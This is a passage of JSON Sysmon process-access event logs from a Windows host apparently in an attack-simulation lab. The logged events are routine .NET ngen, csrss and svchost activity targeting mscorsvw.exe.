(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.511","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-00101FB40C00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.527\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001086960E00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.527","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-001086960E00}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.558\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010A9BA0C00}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.558","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010A9BA0C00}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7051,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.558\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010A9BA0C00}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.558","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010A9BA0C00}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7052,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.574\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010319A0E00}\r\nTargetProcessId: 1324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.574","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010319A0E00}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.621\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001038BE0C00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.621","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001038BE0C00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.621\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001038BE0C00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.621","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001038BE0C00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.636\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-0010699E0E00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:42.636","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0492-5F25-0000-0010699E0E00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:42.683\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0492-5F25-0000-001060A20E00}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\F